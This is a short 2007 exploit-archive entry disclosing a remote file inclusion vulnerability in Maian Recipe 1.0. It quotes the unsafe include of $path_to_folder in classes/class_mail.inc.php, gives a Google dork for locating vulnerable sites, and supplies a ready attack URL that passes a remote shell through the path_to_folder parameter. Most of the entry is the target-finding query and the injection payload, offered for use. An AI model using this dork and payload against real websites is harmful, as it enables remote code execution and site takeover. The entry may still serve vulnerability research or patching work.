[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Maian Recipe 1.0 (path_to_folder) Remote File Include Vulnerability
# Published : 2007-02-07
# Author : Denven
# Previous Title : OTSCMS <= 2.1.5 (SQL/XSS) Multiple Remote Vulnerabilities
# Next Title : LightRO CMS 1.0 (inhalt.php) Remote File Include Vulnerability
*****************
Found by Denven *
*****************
*****************
*****************
Script: http://www.maianscriptworld.co.uk/freestuff_1975_recipe.html
*****************
Google Dork: "Powered by Maian Recipe v1.0"
*****************
ERROR:
classes/class_mail.inc.php :
include($path_to_folder.'classes/class.phpmailer.php');
****************************************************************************
**********
RFI:
http://www.SITE.com/path/classes/class_mail.inc.php?path_to_folder=[shell]
****************************************************************************
**********
denven[at]gmail[dot]com
# www.Syue.com [2007-02-07]